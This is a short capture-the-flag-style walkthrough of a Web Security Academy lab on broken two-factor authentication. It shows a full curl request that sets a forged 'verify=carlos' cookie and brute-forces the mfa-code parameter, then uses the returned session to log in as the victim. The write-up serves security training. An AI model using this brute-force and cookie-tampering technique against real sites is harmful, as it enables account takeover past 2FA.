

if we login with my account and see logs and after test post req to login and login2
without session and change username to carlos
you can't see any protection on 2FA code

so bruteforce 2FA parameter on this req:

curl -i -s -k -X $'POST' \
    -H $'Host: 0a160010040a1657812993150055002e.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 13' -H $'Origin: https://0a160010040a1657812993150055002e.web-security-academy.net' -H $'Referer: https://0a160010040a1657812993150055002e.web-security-academy.net/login2' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' -H $'Connection: keep-alive' \
    -b $'verify=carlos' \
    --data-binary $'mfa-code=1667' \
    $'https://0a160010040a1657812993150055002e.web-security-academy.net/login2'
	
and this req give me a session Id and set in browser then we can login as carlos
	